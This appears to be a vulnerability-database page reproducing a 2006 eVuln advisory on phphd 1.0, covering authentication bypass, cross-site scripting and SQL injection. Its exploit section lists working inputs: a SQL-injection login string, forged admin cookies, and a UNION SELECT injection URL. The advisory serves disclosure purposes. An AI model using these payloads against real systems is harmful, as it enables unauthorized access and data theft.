Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAliaksandr HartsuyeuPACKETSTORM:43801
HistoryFeb 14, 2006 - 12:00 a.m.

EV0060.txt

2006-02-1400:00:00
Aliaksandr Hartsuyeu
packetstormsecurity.com
16

0.055 Low

EPSS

Percentile

92.4%

JSON
`New eVuln Advisory:  
phphd Multiple Vulnerabilities  
http://evuln.com/vulns/60/summary.html  
  
--------------------Summary----------------  
eVuln ID: EV0060  
CVE: CVE-2006-0607 CVE-2006-0608 CVE-2006-0609  
Vendor: Hinton Design  
Vendor's Web Site: http://www.hintondesign.org  
Software: phphd  
Sowtware's Web Site: http://www.hintondesign.org/downloads/view_cat.php?cat_id=91  
Versions: 1.0  
Critical Level: Moderate  
Type: Multiple Vulnerabilities  
Class: Remote  
Status: Unpatched. No reply from developer(s)  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
-----------------Description---------------  
1. Authentication Bypass  
Vulnerable script: check.php  
  
There are two ways to bypass authentication:  
  
a) SQL Injection  
Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.  
Condition: magic_quotes_gpc - off  
  
b) Cookie based authentication  
check.php script dont make password comparisson when identifying user by cookies  
  
  
2. Multiple Cross-Site Scripting  
Vulnerable script: add.php  
Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code.  
  
  
3. Multiple SQL Injections  
Vulnerable scripts: all scripts showing some data from database  
Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.  
Condition: magic_quotes_gpc - off  
  
--------------Exploit----------------------  
Available at: http://evuln.com/vulns/60/exploit.html  
  
  
1. Authentication Bypass  
  
a) SQL Injection  
url: http://host/ht/login.php  
Username: ' or 1/*  
Password: any  
  
b) Cookie based authentication  
Cookie: loged=yes  
Cookie: username=admin  
Cookie: user_level=1  
Cookie: userid=1  
Cookie: [email protected]  
  
  
2. Cross-Site Scripting Example.  
Url: http://host/phphd/add.php  
Download_name: <XSS>  
Version: <XSS>  
Download Description: <XSS>  
  
  
  
3. SQL Injection Example:  
http://host/phphd/view_link.php? file_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15/*  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
`

Related

securityvulns 1
prion 3
cve 3
securityvulns
securityvulns
[eVuln] phphd Multiple Vulnerabilities
2006-02-14 00:00:00
prion
prion
Cross site scripting
2006-02-08 23:02:00
Sql injection
2006-02-08 23:02:00
Authentication flaw
2006-02-08 23:02:00
cve
cve
CVE-2006-0607
2006-02-08 23:02:00
CVE-2006-0608
2006-02-08 23:02:00
CVE-2006-0609
2006-02-08 23:02:00

0.055 Low

EPSS

Percentile

92.4%

JSON
Related for PACKETSTORM:43801
securityvulns1prion3cve3